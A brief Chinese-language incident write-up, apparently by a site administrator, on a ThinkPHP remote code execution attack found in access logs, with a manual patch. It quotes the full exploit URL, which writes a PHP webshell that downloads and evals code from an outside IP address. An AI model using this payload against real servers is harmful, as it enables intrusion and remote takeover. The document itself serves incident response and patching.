查看网站访问日志，查看到异常请求URL地址

/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=upload/indev.php&vars%5B1%5D%5B%5D=%3C?php%20function%20s()%7B$contents%20=%20file_get_contents(base64_decode(%22aHR0cDovLzE1NC40OC4yNDEuOTMvNDA0LmpwZw==%22));a($contents);%7Dfunction%20a($conn)%7B$b%20=%20'';eval($b.$conn.$b);%7Ds();?%3E

执行后直接在upload目录下生成indev.php文件，执行此文件就修改了入口文件，搜索查询是因为框架漏洞，手动修复方法如下：

// 在 think\App 类的 module 方法的获取控制器的代码（大概375行）后面加上
if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}

修改后此被攻击的URL失败，证明修复成功。

ThinkPHP相关说明的官网链接：https://blog.thinkphp.cn/869075